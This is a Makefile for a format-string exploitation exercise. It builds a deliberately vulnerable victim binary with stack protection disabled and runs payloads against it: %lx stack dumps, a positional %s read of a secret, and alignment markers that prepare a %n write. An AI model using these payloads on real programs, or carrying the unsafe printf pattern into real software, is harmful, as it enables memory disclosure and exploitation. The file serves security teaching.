# Helper targets for a format-string exploitation exercise: victim.c is
# expected to hand its first command-line argument to a printf-style function
# as the format string, and the targets below build it and drive it with
# payloads that read (and, in principle, write) memory through that hole.
#

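# The command-style targets are not files: declare them phony so a stray file
# named `clean` or `inspect` cannot mask the rule, and let make discard a
# half-written `victim` if the compiler fails part-way through.
.PHONY: all inspect findformat clean
.DELETE_ON_ERROR:

all: victim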

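# Build the vulnerable binary.
#
# GNU make's built-in CC is `cc`; this exercise was written against gcc, so
# default to gcc while still honouring `make CC=...` or an exported CC.
ifeq ($(origin CC),default)
CC := gcc
endif

# -fno-stack-protector is part of the exercise (presumably to keep the frame
# layout seen via %lx simple); -Wall stays next to it so the original command
# line is preserved. Both live in LAB_CFLAGS rather than CFLAGS so that a
# user's `make CFLAGS=-g` cannot silently drop them.
LAB_CFLAGS := -Wall -fno-stack-protector

# NOTE(review): nothing here pins PIE, ASLR or _FORTIFY_SOURCE; the argument
# offsets found by `inspect`/`findformat` depend on the toolchain defaults and
# on /proc/sys/kernel/randomize_va_space, so confirm them on the machine the
# exercise runs on rather than copying them from elsewhere.
victim: victim.c
	$(CC) $(LAB_CFLAGS) $(CFLAGS) -o $@ $<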

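# Walk the printf arguments with %lx until the pointer to the secret string
# shows up, then read the string directly with a positional (`%N$s`) conversion.
#
# `$$` is make's escape for a literal `$`. The payload is generated by python
# so the repetition factor is easy to tweak; `print(...)` with a single
# parenthesised argument works under both Python 2 and 3, whereas the
# statement form `print '...'` is a SyntaxError on Python 3.
inspect: victim
	@# 20 x "%#018lx" dumps 20 consecutive 8-byte arguments, zero-padded so
	@# the columns line up (on x86-64 the first few come from registers, the
	@# rest are stack slots).
	./victim "$$(python -c "print('%#018lx  '*20)")"
	@# with the positional form we can name the argument we want, so read the
	@# secret via the pointer spotted in the dump above (adjust the index if
	@# the pointer sat in a different slot).
	./victim '%1$$s'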

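# Locate the format string itself among the printf arguments, the usual
# prelude to a %n write: the As are an 8-byte marker that should appear as
# 0x4141414141414141 in the dump once the B padding aligns it to an 8-byte
# slot. `print(...)` with parentheses keeps the payload working under both
# Python 2 and 3.
findformat: victim
	@# adjust the B repetition factors until the As land on an 8-byte boundary
	./victim "$$(python -c "print('B'*14 + 'A'*8 + 'B'*5 + '\n' + '%#018lx  '*144)")"
	@# now swap the marker for the address we would want %n to target...
	@# ... which cannot work through argv: a user-space x86-64 address has
	@# zero high bytes, argv strings are NUL-terminated, so execve cuts the
	@# payload at the first 0x00. 0x43 ('C') is only a stand-in; note too
	@# that Python 3's print would UTF-8-encode any byte >= 0x80, so real
	@# address bytes would have to go through sys.stdout.buffer.write.
	./victim "$$(python -c "print('B'*14 + '\x43'*8 + 'B'*5 + '\n' + '%#018lx  '*144)")"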

# Remove the build product; $(RM) expands to `rm -f`, so a missing binary is
# not treated as an error.
clean:
	$(RM) victim
